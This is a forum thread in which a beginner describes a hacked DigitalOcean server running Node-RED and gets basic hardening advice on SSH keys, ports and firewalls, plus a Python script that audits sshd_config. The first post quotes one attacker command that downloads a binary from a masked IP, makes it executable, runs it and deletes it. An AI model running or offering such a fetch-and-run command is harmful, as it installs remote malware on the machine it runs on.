My server running on DigitalOcean was hacked around October, most likely by a botnet (google: …). This thing is used for DDoS as far as I understand, but you never know what else has been changed...
I realized because I saw many commands similar to the one below in the command line:
"cd /tmp; curl -o php http://XX.XX.XX.XX/a-r.m-6.ISIS ; chmod +x php; ./php; rm -rf php"
If you saw things like this, you have also been hacked. It seems like I have not been the only one, especially in the Node-Red community:
Could it be that hackers just looked for an entry point by scanning Node-RED ports?
So I am a beginner in IT like many others here, and the topics I found on this forum are in my view rather professional level. DigitalOcean told me to scrap the instance, which I will do, but it's a major pain since I run Node-RED, Grafana, InfluxDB etc. on it, so setting it all up again is a good day+ of work.
My questions since I am rather new to IT security:
Can anyone recommend an entry level guide to IT security on hosted servers like Digitalocean where I don't need to spend days to understand the keywords and what I need to do?
DigitalOcean wrote to me: "your Droplet does have password authentication enabled. Password-based authentication lacks a strong identity check and no one wants hackers to launch a brute force attack to hack into your server, so it's a good practice to disable password authentication in the OpenSSH server." Doesn't make sense to me, can someone explain that? I understand the brute force part, but wouldn't it make more sense to just have a very complex password instead of having none?
Sorry, very beginner question, but I read in this forum that it's dangerous to leave a port open. On a hosted server with Node-RED running, what does it mean to open and close a port?
DigitalOcean recommended using ClamAV and the freshclam library, but then again I couldn't do it because it said "database load killed by Signal 9", which could mean that my instance does not have enough RAM to execute it. Has anyone had and overcome this problem?
Many thanks. It seems that around last October a rather large attack was happening, and I guess many early users like me aren't aware that this happened. It would be great to have a simple guide on how to avoid this so it never happens again.
No. You DO need to spend days understanding things.
A stronger password is better than a weak one of course. But they are suggesting that you use certificate-based SSH authentication which is much stronger still.
TCP/IP is the protocol for networking over the Internet. It uses addresses and ports to identify channels of communication. Many common services have standard ports. For example, the web (HTTP/HTTPS) typically uses Port 80 for HTTP and Port 443 for HTTPS.
You can use a local firewall on a Droplet to ensure that only specific ports are open. You could also use it to change default ports. For example, SSH runs on Port 22 but an internet-facing service will start being attacked on that port within seconds of appearing on the Internet - so better to change the externally facing port to something else.
AV = Anti-Virus. Good for protecting the data files on your server but not much else.
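One concrete way to check the password-authentication point in the reply above, as an added example and not code from this thread or from DigitalOcean: a small Python audit of an sshd_config that applies OpenSSH's own rules (the first occurrence of a keyword wins, commented-out lines do not count, and lines after a Match block are conditional). The sample config is constructed to look like a stock Ubuntu file; the keyword defaults are OpenSSH's documented ones.

```python
"""Audit an OpenSSH sshd_config for the settings a hosting provider warns about.

Rules modelled here: keywords are case-insensitive, '#' starts a comment, the
FIRST occurrence of a keyword is the one sshd uses, and anything after a
'Match' line applies only conditionally, so it is ignored for the global verdict.
"""
import re
from typing import Dict, List

# OpenSSH defaults that apply when the keyword is absent (or only commented out).
DEFAULTS = {
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "prohibit-password",
}

# Constructed sample: the commented line is exactly what a stock Ubuntu file
# shows, and it misleads beginners because sshd still applies the default 'yes'.
SAMPLE_CONFIG = """\
Port 22
#PasswordAuthentication yes
PubkeyAuthentication yes
PermitRootLogin yes
Match User deploy
    PasswordAuthentication no
"""

def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return the effective global value of every keyword (first match wins)."""
    seen: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and whitespace
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # 'Key value' or 'Key=value'
        key = parts[0].lower()
        if key == "match":                      # conditional section: stop here
            break
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        seen.setdefault(key, value)             # keep the first occurrence only
    return seen

def audit(text: str) -> List[str]:
    """List the findings a hardening review would raise for this config."""
    cfg = parse_sshd_config(text)
    effective = lambda k: cfg.get(k, DEFAULTS[k])
    findings = []
    if effective("passwordauthentication") != "no":
        findings.append("PasswordAuthentication effectively yes: brute-force target")
    if effective("pubkeyauthentication") != "yes":
        findings.append("PubkeyAuthentication off: key-based login would not work")
    if effective("permitrootlogin") == "yes":
        findings.append("PermitRootLogin yes: root can be brute-forced directly")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG) or ["no findings"]:
        print(finding)
```

Run it against a copy of /etc/ssh/sshd_config; an empty list means the three settings are as the reply recommends.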